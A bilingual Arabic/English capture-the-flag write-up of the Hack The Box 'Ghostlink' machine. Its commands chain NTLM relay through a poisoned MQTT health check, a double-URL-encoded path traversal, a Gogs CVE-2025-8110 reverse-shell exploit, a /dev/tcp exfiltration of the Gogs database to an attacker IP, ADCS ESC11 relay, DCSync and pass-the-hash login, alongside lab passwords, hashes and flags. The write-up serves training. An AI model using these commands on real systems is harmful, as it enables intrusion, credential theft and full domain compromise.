Share
## https://sploitus.com/exploit?id=8D407E0B-F380-59BB-A1C3-E9F823DF3496
# ─── Ghostlink ───
# 🏴 AMN SECURITY 🏴
### مركز أبحاث الأمن السيبراني | Cyber Security Research Center
---
# 🎯 تقييم اختراق Ghostlink — HTB
### Hard | Active Directory + Linux (Gogs)
---
### 📋 الملخص التنفيذي
ماكينة **Ghostlink** من HTB بمستوى **Hard** تجمع بين **Active Directory** domain controller وسيرفر **Gogs** على Linux. سلسلة الهجوم تبدأ باستغلال خدمة MQTT لاستخراج هويات الأنظمة الداخلية، ثم تتابع NTLM للوصول إلى تطبيق مشاركة الملفات المشفر، وثغرة اجتياز المسار (Double URL-Encoded) لتحميل ntuser.dat وتحليلها لاستخراج بيانات KeePass. بعد ذلك استغلال **CVE-2025-8110** في Gogs للحصول على شل، وصولاً إلى هجوم **ESC11 على ADCS** و **DCSync** للحصول على صلاحيات Administrator.
---
### 🔍 تفاصيل الهجوم
| المرحلة | التقنية | الأداة |
|---------|---------|--------|
| **الاستطلاع** | فحص المنافذ | nmap |
| **MQTT** | استغلال خدمة MQTT للكشف عن الأجهزة الداخلية | mqttui |
| **NTLM Relay** | تعديل فحص الصحة في MQTT لسرقة هاش NTLM | responder + ntlmrelayx |
| **Path Traversal** | ثغرة مسار مشفر مزدوجاً لتحميل ntuser.dat | Burp Suite |
| **Registry Analysis** | تحليل ntuser.dat لاستخراج RecentDocs | regripper |
| **KeePass** | فتح قاعدة KeePass للحصول على كلمة سر Gogs | keepass2 / kpcli |
| **Gogs RCE** | استغلال CVE-2025-8110 عبر تزوير ملف الإعدادات | exploit_cve_2025_8110.py |
| **Lateral Movement** | فك تشفير هاش Gogs → الانتقال للمستخدم nvirelli | hashcat |
| **ADCS ESC11** | طلب شهادة Domain Controller عبر ICPR | certipy + coercer + ntlmrelayx |
| **DCSync** | سحب هاش Administrator | secretsdump (Impacket) |
| **WinRM** | الاتصال بالسيرفر | evil-winrm |
---
### 💥 سلسلة الهجوم الكاملة
#### 1️⃣ استطلاع MQTT
```
nmap → اكتشاف mqtt (1883/tcp) → اتصال مجهول →
موضوعات MQTT تكشف عن:
- gpz-op26-secure.ghostlink.htb
- gpz-op26-toolkits.ghostlink.htb (Gogs v0.13.3)
```
```bash
# فحص المنافذ
nmap -Pn -sV -A -p- -T4 ghostlink.htb
# الاتصال بـ MQTT
./mqttui -b mqtt://ghostlink.htb
```
#### 2️⃣ تتابع NTLM
```bash
# تشغيل Responder
sudo responder -I tun0 -v
# تعديل فحص MQTT للإشارة إلى خادم المهاجم
j='{"timestamp":"2026-03-03-09:26:21","node":"node-6",\
"telemetry":{"healthy":true,"url":"http://10.10.14.X",\
"lastCheckSecAgo":45,"responseCode":"200","ip":"172.16.20.10"}}'
./mqttui -b mqtt://ghostlink.htb publish -r \
"GhostProtocolZero/systems/node/secureshare/healthcheck" "$j"
# تتابع NTLM مع SOCKS
ntlmrelayx.py -t http://gpz-op26-secure.ghostlink.htb \
--http-port 8888 --keep-relaying -socks
```
#### 3️⃣ ثغرة المسار المشفر المضاعف
```http
# Double URL-Encoded Path Traversal
GET /api/download/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%2575%2573%2565%2572%2573%255c%2573%2576%2563%255f%2563%2561%256e%2561%2572%2579%255c%256e%2574%2575%2573%2565%2572%252e%2564%2561%2574 HTTP/1.1
```
```bash
# تحليل ntuser.dat
regripper -r ntuser.dat -a | grep -i recent -A 3 -B 3
# → تم العثور على db.zip في RecentDocs
# تحميل KeePass
# → فك الضغط: db.kdbx + .key.keyx
# → كلمة سر Gogs: vroth:F5uWXn40bvn6BB8r
```
#### 4️⃣ استغلال Gogs (CVE-2025-8110)
```python
# إنشاء مستودع → دفع symlink إلى .git/config →
# PUT محتوى معدّل عبر API (sshCommand = reverse shell) →
# Gogs يتّبع الـ symlink ويعدّل الإعدادات →
# git fetch origin يشغّل الـ sshCommand ← شل
python3 exploit_cve_2025_8110.py \
-t http://gpz-op26-toolkits.ghostlink.htb \
-u vroth -p 'F5uWXn40bvn6BB8r' \
--lhost 10.10.14.X --lport 9001
```
#### 5️⃣ الانتقال لـ nvirelli
```bash
# سحب قاعدة Gogs
cat /opt/gogs/data/gogs.db > /dev/tcp/10.10.14.X/4444
# فك هاش nvirelli
hashcat -a 0 -m 10900 \
sha256:10000:RFczWWR4UHkyNQ==:jZs6AcOgJgs52wEa7R2/I5uLGyivYUHyiqAdOzq4/9RAi8W5Bl/5V+cWN1p77BdV0+g= \
trimmed.txt
# → u47YUclrDiwWxBheaSzI
su nvirelli
cat /home/nvirelli/user.txt
```
**🏁 User Flag:** `517e0dc018be9f02e70f07041d87436c`
#### 6️⃣ ADCS ESC11 → Domain Admin
```bash
# الكشف عن ESC11
certipy find -u 'nvirelli@ghostlink.htb' -p 'u47YUclrDiwWxBheaSzI' \
-dc-host dc01.ghostlink.htb -vulnerable -stdout
# المحطة 1 — تتابع NTLM
ntlmrelayx.py -t rpc://172.16.20.10 -rpc-mode ICPR \
-icpr-ca-name 'ghostlink-GPZ-OP26-SECURE-CA' -smb2support \
--template DomainController
# المحطة 2 — إجبار المصادقة
coercer coerce -l 10.10.14.X -t dc01.ghostlink.htb \
-d ghostlink.htb -u nvirelli -p 'u47YUclrDiwWxBheaSzI' \
--dc-ip dc01.ghostlink.htb --always-continue
# المصادقة بشهادة DC
certipy auth -pfx DC01.pfx -dc-ip dc01.ghostlink.htb -domain ghostlink.htb
# DCSync لسحب هاش Administrator
secretsdump.py ghostlink.htb/dc01\$@dc01.ghostlink.htb \
-dc-ip ghostlink.htb \
-hashes :f09e86e9b9c7e94f2fabaa9e31757e50 \
-just-dc-user administrator
# الاتصال بالـ DC
evil-winrm -i dc01.ghostlink.htb -u administrator -H 8190e067f478002ddd63eb209b016696
```
**🏁 Root Flag:** `2588a2ad418cf54d95ea15a8eb4f12e0`
---
### 📂 محتويات المستودع
| الملف | الوصف |
|-------|-------|
| `README.md` | الشرح الكامل |
| `codes/exploit_cve_2025_8110.py` | استغلال Gogs RCE |
| `codes/gogs_to_hashcat.py` | تحويل هاش Gogs لـ Hashcat |
| `codes/double_url_encode.py` | تشفير المسارات لـ Path Traversal |
| `codes/hooks-attack/su_reader.py` | تشغيل su بكلمة سر عبر pty |
---
### 📚 المراجع
- **CVE-2025-8110**: Gogs v0.13.3 Symlink RCE
- **ADCS ESC11**: https://github.com/ly4k/Certipy
- **Impacket**: https://github.com/fortra/impacket
- **AMN SECURITY Research**: Ghostlink Full Chain Analysis
---
### 👥 فريق AMN SECURITY
| العضو | الدور |
|-------|-------|
| Ayman Mahmoud Jasim | تحليل وتطوير الاستغلال |
| AMN Research Team | تحليل الثغرات |
| AMN Exploitation Team | تطوير الإكسبلويت |
---
---
# 🎯 Ghostlink HTB — Full Penetration Test Report
### Hard | Active Directory + Linux (Gogs) | CVE-2025-8110 → ESC11
---
### 📋 Executive Summary
**Ghostlink** is a Hard difficulty HTB machine featuring an Active Directory domain controller and a Linux-based Gogs server. The attack chain begins with **MQTT** enumeration discovering internal hosts, followed by **NTLM relay** to access a Secure File Sharing application. A **double URL-encoded path traversal** downloads `ntuser.dat`, revealing KeePass credentials. **CVE-2025-8110** Gogs RCE provides a foothold, followed by hash cracking to pivot to user `nvirelli`. Finally, **ADCS ESC11** yields a Domain Controller certificate, enabling **DCSync** for full domain compromise.
---
### 🔍 Attack Chain
| Stage | Technique | Tool |
|-------|-----------|------|
| **Recon** | Port scanning | nmap |
| **MQTT** | Anonymous MQTT enumeration | mqttui |
| **NTLM Relay** | Health check poisoning → NTLM capture | responder + ntlmrelayx |
| **Path Traversal** | Double URL-encoded path traversal | Burp Suite |
| **Forensics** | Registry hive analysis | regripper |
| **KeePass** | Password database extraction | keepass2 / kpcli |
| **Gogs RCE** | CVE-2025-8110 symlink → config overwrite | exploit_cve_2025_8110.py |
| **Lateral Move** | Gogs hash cracking → user nvirelli | hashcat |
| **ADCS ESC11** | ICPR relay → DC certificate | certipy + coercer + ntlmrelayx |
| **DCSync** | Dump Administrator hash | secretsdump (Impacket) |
| **WinRM** | Remote shell | evil-winrm |
---
### 💥 Full Attack Chain
#### 1️⃣ MQTT Recon & NTLM Relay
```bash
# MQTT anonymous access → discover internal hosts
mqttui -b mqtt://ghostlink.htb
# Poison MQTT health check → NTLM capture
responder -I tun0 -v
ntlmrelayx.py -t http://gpz-op26-secure.ghostlink.htb --http-port 8888 -socks
```
#### 2️⃣ Double URL-Encoded Path Traversal
```http
GET /api/download/%252e%252e%255c...%2564%2561%2574 HTTP/1.1
```
→ Download `ntuser.dat` → `regripper` reveals `db.zip` → KeePass creds
#### 3️⃣ Gogs RCE (CVE-2025-8110)
```python
# Symlink-based .git/config overwrite → sshCommand execution
python3 codes/exploit_cve_2025_8110.py \
-t http://gpz-op26-toolkits.ghostlink.htb \
-u vroth -p 'F5uWXn40bvn6BB8r' \
--lhost 10.10.14.X --lport 9001
```
#### 4️⃣ User Flag
```bash
# Crack Gogs DB hash → password: u47YUclrDiwWxBheaSzI
su nvirelli
cat /home/nvirelli/user.txt # → 517e0dc018be9f02e70f07041d87436c
```
#### 5️⃣ ADCS ESC11 → Domain Admin
```bash
# ESC11: ICPR relay → Domain Controller certificate
certipy find -u 'nvirelli@ghostlink.htb' -p 'u47YUclrDiwWxBheaSzI' \
-dc-host dc01.ghostlink.htb -vulnerable
# Terminal 1: NTLM relay
ntlmrelayx.py -t rpc://172.16.20.10 -rpc-mode ICPR \
-icpr-ca-name 'ghostlink-GPZ-OP26-SECURE-CA' \
--template DomainController
# Terminal 2: Coerce authentication
coercer coerce -l 10.10.14.X -t dc01.ghostlink.htb \
-d ghostlink.htb -u nvirelli -p 'u47YUclrDiwWxBheaSzI'
# Authenticate with DC certificate
certipy auth -pfx DC01.pfx -dc-ip dc01.ghostlink.htb
secretsdump.py ghostlink.htb/dc01\$@dc01.ghostlink.htb \
-hashes :f09e86e9b9c7e94f2fabaa9e31757e50 -just-dc-user administrator
# WinRM access
evil-winrm -i dc01.ghostlink.htb -u administrator -H 8190e067f478002ddd63eb209b016696
```
---
### 🏁 Flags
| Flag | Value |
|------|-------|
| **Root (Administrator)** | `2588a2ad418cf54d95ea15a8eb4f12e0` |
| **User (nvirelli)** | `517e0dc018be9f02e70f07041d87436c` |
---
### 📂 Repository Structure
```
📁 ghostlink-writeup/
├── README.md # Full writeup
├── codes/
│ ├── exploit_cve_2025_8110.py # Gogs RCE exploit
│ ├── gogs_to_hashcat.py # Hash converter
│ ├── double_url_encode.py # URL encoder helper
│ └── hooks-attack/
│ └── su_reader.py # PTY su wrapper
```
---
### 📚 References
- **HTB**: https://www.hackthebox.com
- **CVE-2025-8110**: Gogs v0.13.3 Symlink RCE
- **Certipy**: https://github.com/ly4k/Certipy
- **Impacket**: https://github.com/fortra/impacket
- **AMN SECURITY**: Ghostlink Full Chain Analysis
---
## Connect with AMN SECURITY — تابعنا
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
---
### ⚖️ Disclaimer
This repository is for **authorized security testing and educational purposes only**. Unauthorized use is illegal. The authors and AMN SECURITY assume no liability for misuse.
---
**🏴 AMN SECURITY** — Enterprise Offensive Security